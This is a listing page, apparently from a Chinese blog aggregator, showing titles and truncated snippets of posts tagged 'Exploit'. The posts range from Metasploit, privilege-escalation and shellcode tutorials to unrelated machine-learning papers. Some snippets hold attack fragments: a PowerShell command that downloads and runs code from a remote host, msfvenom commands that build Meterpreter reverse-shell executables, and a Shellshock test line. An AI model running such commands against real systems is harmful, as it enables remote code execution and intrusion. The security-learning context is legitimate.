Exploit

msf传递shell给cobalt strike

powershell.exe-nop-whidden-c"IEX((new-objectnet.webclient).downloadstring('http://10.10.10.20:80/a'))"方法2:通过msf的exploit
mirror97black·2020-07-05 00:00

python nmap模块扫码端口

操作系统:centos7.4官网地址:https://pypi.org/project/python-nmap/漏洞网址:https://www.exploit-db.com/一、安装#首先安装nmap
幸福丶如此·2020-07-04 23:22

关于论文翻译的一切

(image-6f792c-1593862843865)]论文标题:GAPNet:GraphAttentionbasedPointNeuralNetworkforExploitingLocalFeatureofPointCloud
杜若飞er·2020-07-04 19:52

Exploit writing tutorial part 9 : Introduction to Win32 shellcoding

Overthelastcoupleofmonths,IhavewrittenasetoftutorialsaboutbuildingexploitsthattargettheWindowsstack.Oneoftheprimarygoalsofanyonewritinganexploitistomodifythenormalexecutionflowoftheapplicationandtrigg
dandandeshui·2020-07-04 14:35

android上的漏洞挖掘方式和Fuzz

https://www.blackhat.com/docs/asia-16/materials/asia-16-He-Hey-Your-Parcel-Looks-Bad-Fuzzing-And-Exploiting-Parcelization-Vulnerabilities-In-Android-wp.pdf
inquisiter·2020-07-04 12:59

Soft-Actor-Critic-强化学习算法

Explorationvs.ExploitationPseudocodeDocumentationBackgroundSAC算法,它以off-policy方式优化随机策略,从而在随机策略优化和DDP
Mystery_zu·2020-07-04 11:30

metasplort后渗透模块介绍

platformwindows-pwindows/meterpreter/reverse_tcpLhost=192.168.48.129LPORT=9999-b“\00”-ex86/shikata_ga_nai-fexe-oss.exeuseexploit
小翼同志·2020-07-04 09:05

EASY TRANSFER LEARNING BY EXPLOITING INTRA-DOMAIN STRUCTURES read

关键词:迁移学习,域自适应,交叉域学习,无参学习方法的提出背景:1)大部分传统的和深度学习的迁移算法是参数方法,需要花费大量的时间和金钱成本去训练那些超参数。2)交叉验证往往是用来提高模型准确率的方法,然而在迁移学习中不可用,因为目标域没有标签。3)尽管目前自动的机器学习算法能够自动的调节超参数,如树剪枝、boosting、神经网络,但是它们很难克服两个域的差别。EasyTLEasyTL通过域内对
AI小将·2020-07-04 07:30

后渗透篇:Windows x64下提权Exploit整理

Windows x64 Local Privilege Escalation0x00前言在CVE-2014-4113出来后,x64环境下的提权又是一片短暂的光明。在此漏洞披露前,PR/IIS溢出/LPK劫持等对64位版本都无效果,网上公开曾有一个Exp有效,代号为MS10048x64。本文谨记录x64下可提权的Exp与测试过程。暂不考虑依赖第三方服务(如MSSQL/MYSQL/FTP)等的提权。 
Agan '·2020-07-04 05:37

Kali-利用metasploit中的exploit/multi/handler进行攻击

reverse_tcpLHOST=192.168.52.133LPORT=443-fexe-omet.exe打开msfconsole控制台root@qzwhost:~#msfconsolemsfconsole>useexploit
齐泽文的Blog·2020-07-02 16:02

searchsploit使用攻略

1.1searchsploit简介ExploitDatabase(https://github.com/offensive-security/exploit-database)这是OffensiveSecurity
simeon2015·2020-07-02 04:10

Dragoš-2018-Evolution of exploitative interactions during diversification in Bacillus.md

EvolutionofexploitativeinteractionsduringdiversificationinBacillussubtilisbiofilmsDragoš,A.,Lakshmanan
gouxuenan·2020-07-02 01:55

英语六级、考研高频词汇

exploit利用,开发,开采,剥削alter改变,改动,变更,修改extensive广泛的,广阔的,大量的assert肯定地说,断言,维护,坚持grave坟墓,严重的,庄严的cherish珍爱,珍视,
托沃斯-勒夫·2020-07-02 00:06

虚假新闻检测数据集

使用论文:(1)AStylometricInquiryintoHyperpartisanandFakeNews(2)ExploitingTri-RelationshipforFakeNewsDetection2
c2a2o2·2020-07-01 19:17

服务器防黑加固丨Linux提权的4种方式,你知道几个?

Metasploit拥有各种使用不同技术的exploits在受害者电脑上尝试获取系统级权限。除此之外,这里还有一些在linux下使用的脚本。当你尝试在目标机器上提升权
悬镜AI安全·2020-07-01 07:28

论文笔记 -- ISSCC-2020: GANPU (Multi-DNN Processor for GANs with Speculative Dual-Sparsity Exploitation)

ISSCC-2020-GANPU论文解读@论文笔记GANPU:A135TFLOPS/WMulti-DNNTrainingProcessorforGANswithSpeculativeDual-SparsityExploitation
love小酒窝·2020-07-01 02:43

CCKS 2018 | 前沿技术讲习班

时间:8月14日-15日地点:南开大学泰达学院大报告厅日程安排时间主题特邀讲者8月14日上午(8:30–10:00)DeepKnowledgeGraphReasoning(10:30-12:00)ExploitingandReasoningWithOpenKnowledgeGraphWilliamWangJeffPan8
开放知识图谱·2020-07-01 01:21

LDAP injection

DescriptionLDAPInjectionisanattackusedtoexploitwebbasedapplicationsthatconstructLDAPstatementsbasedonuserinput.Whenanapplicationfailstoproperlysanitizeuserinput
zhigangsun·2020-06-30 16:13

渗透中PoC、Exp、Payload与Shellcode的区别(转载自Howie's Notes)

Exp,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。Payload,中文“有效载荷”,指成功exploit
SnailWalking·2020-06-30 14:07

二进制漏洞挖掘之栈溢出-开启FORTIFY

二进制漏洞-栈溢出github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow你可以用于学习,但不能用于商用(如出书、
sp00f·2020-06-30 08:41

Joomla-3.4.6远程代码执行漏洞复现

#02漏洞简介在exploit-db(https://www.exp
yi_jin_·2020-06-30 07:57

Cve-2012-1823 PHP CGI Argument Injection Exploit

原帖代码地址为:http://www.exploit-db.com/exploits/18836/由于其实为py2.x版本服务的,所以我将代码改为py3了。
Yatere·2020-06-30 06:35

利用ms08-067漏洞远程控制Windowsxp

有区别)4、查看options(yes为必填部分):5、输入RHOST(目标靶机)IP和LHOST的IP:6、查看适合的系统类型(简体中文sp3,编号34):7、可选target0(自动)或自己选择:8、exploit
xyx107·2020-06-30 04:52

pwntools安装使用方法

pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit
Xysoul·2020-06-30 04:45

常见的服务器溢出提权方法

0×00前言0×01找可写目录0×02运行exploit提权0×03附录0×00前言溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的
Xysoul·2020-06-30 04:12

metasploit的模块构成及功能分析

exploit@ubuntu:/pentest/framework
Xysoul·2020-06-30 04:40

gcc题文章

lab1_3_2_2_address_space.htmlhttp://www.kernel-panic.it/security/shellcode/shellcode5.htmlhttps://www.exploit-db.com
geeksforgeeks·2020-06-30 04:30

使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时出现的exploit completed but no session was created的解决办法

我在使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时,总是出现的exploitcompletedbutnosessionwascreated的问题,针对这个现象
xixitaoguliuxian·2020-06-30 02:59

Linux Shellcoding学习

如今shellcode的含义已经扩展了,现在指一切可以被插入到漏洞利用(Exploit)中执行特定功能的字节码。2.网络有成千上万shellcode,为什么我要自己写?
星空你好·2020-06-30 02:50

检测cgi-bin漏洞存在方法

bash漏洞技术层面分析漏洞起源:漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令:envx='(){:;};echovulnerable'bash-c"echothisisatest
shawnsec·2020-06-30 01:53

强化学习方法(一):探索-利用困境exploration exploitation,Multi-armed bandit

欢迎转载,转载请注明:本文出自Bin的专栏blog.csdn.net/xbinworld。技术交流QQ群:433250724,欢迎对算法、技术感兴趣的同学加入。18年新开一个强化学习方法系列,督促自己能够再不断扩充知识并分享给更多的同学。其实前面写的机器学习方法系列和深度学习方法系列,也都还没有写够,平时工作比较忙,更新很慢,但是我还是会努力更新的。今天开始记录一些强化学习的知识,这些内容以前多少
大饼博士X·2020-06-29 23:06

CVE-2020-0796 漏洞原理

https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.htmlThisblogpostwascreatedduetoamistakefromMicrosoft
子曰小玖·2020-06-29 22:54

内网渗透之——windows本地漏洞提权之——溢出提权

利用本地服务提权漏洞基本思路1.systeminfo收集补丁信息执行命令:systeminfo查看系统信息(包含补丁信息)2.对比补丁编号,寻找可用exp(Exploit,漏洞攻击脚本)寻找此版本存在的所有漏洞
卖N孩的X火柴·2020-06-29 20:35

计算机开放电子书 2017 归档

SourceForge下载CTFWriteups2016.9.29Gitee下载Github下载SourceForge下载Django中文文档1.820170215Gitee下载Github下载SourceForge下载Exploit
布客飞龙·2020-06-29 19:47

GAT和GCN的局限性

[EGNN]ExploitingEdgeFeaturesforGraphNeuralNetworks基于边缘特征的图神经网络论文详解CVPR2019GAT和GCN的局限性GAT和GCNs之间的本质区别在于聚集邻居权值的方式不同
失伊·2020-06-29 16:34

后渗透流程

后渗透流程权限提升绕过UACmsf模块Exploit/windows/local/bypassuacExploit/windows/local/bypassuac_injectionExploit/windows
FFM-G·2020-06-29 12:05

Vulnhub:MuzzyBox:1

MuzzyBox:1描述:IhavecreatedthisamazingCTFforpentester.However,ThisisnotlikeotherCTFwhichhasbeenusingcommonexploitsandtools.Instead
c h e n�·2020-06-29 10:50

聚焦五步骤

步骤2:DecidehowtoEXPLOITthesystem'sconstraint(s).决定如何挖尽系统的制约因素。
李斌CamusLi·2020-06-29 07:08

【干货】Metasploit使用笔记(基本命令)

基本操作命令showexploits查看所有exploitshowpayloads查看所有payloadshowauxiliary查看所有auxiliarysearchname搜索exploit等info
Po7mn1·2020-06-29 05:59

腾讯AI Lab 提出「完全依存森林」,大幅缓解关系抽取中的错误传递

今天解读论文为:《RelationExtractionExploitingFullDependencyForests》
喜欢打酱油的老鸟·2020-06-29 03:34

《利用深度卷积神经网络学习的图像特征对肿瘤上皮和间质进行分类》文献阅读笔记

ClassificationofTumorEpitheliumandStromabyExploitingImageFeaturesLearnedbyDeepConvolutionalNeuralNetworks
一颗修行千年的葱·2020-06-29 00:28

2019年最佳黑客书籍 - 初级到高级

2019年最佳黑客书籍-初级到高级1、TheHackersPlaybook22、TheHackersPlaybook33、Rtfm:RedTeamFieldManual4、Hacking:TheArtofExploitation
xiaoyaoyou.xyz·2020-06-28 22:04

kali渗透测试win10

meterpreter/reverse_tcplhost=自己地址lport=端口号-fexex>XX.exe把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接在kali中msfconsolemsf>useexploit
舌耳·2020-06-28 20:26

RC4 in TLS is Broken: Now What?

in-tls-is-broken-now-whatRC4haslongbeenconsideredproblematic,butuntilveryrecentlytherewasnoknownwaytoexploittheweaknesses.AftertheBEASTat
weixin_34409357·2020-06-28 19:03

管理口SSH服务存在拒绝服务漏洞(CVE-2016-6515)

我点开了,邮件中的链接(https://github.com/opsxcq/exploit-CVE-2016-6515)发现,漏洞的描述是:Before7.3OpenSSHdoesnotlimitpasswordlengthsforpasswordauthentication
weixin_34377065·2020-06-28 18:13

Kali linux 2016.2(Rolling)中的Exploits模块详解

简单来讲,这个Exploits模块,就是针对不同的已知漏洞的利用程序。
weixin_34376562·2020-06-28 18:35

CVE-2014-6271 Bash漏洞利用工具

CVE-2014-6271Bash漏洞利用工具Exploit1(CVE-2014-6271)envx='(){:;};echovulnerable'bash-c"echothisisatest"Ifyousee"vulnerable"youneedtoupdatebash.Otherwise
weixin_34357267·2020-06-28 17:51

firefox插件-HackBar介绍与试用

Thistoolbarwillhelpyouintestingsqlinjections,XSSholesandsitesecurity.ItisNOTatoolforexecutingstandardexploitsanditwillNOTteachyouhowtohackasite.Itsmainpurposeistohelpadeveloperdosecurityauditsonhiscod
weixin_34355715·2020-06-28 17:30

漏洞评估和渗透测试的区别

2019独角兽企业重金招聘Python工程师标准>>>LanguageMattersClarifiedDefinitionsAPhysicalAnalogTheExploitationAnglePentestsDon
weixin_34342207·2020-06-28 17:57

反序列化工具ysoserial使用介绍

github.com/angelwhu/ysoserial0x01基本使用方法在公网vps上执行:java-cpysoserial-0.0.6-SNAPSHOT-BETA-all.jarysoserial.exploit.JRMPListen
weixin_34275734·2020-06-28 15:28
上一页 19 20 21 22 23 24 25 26 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他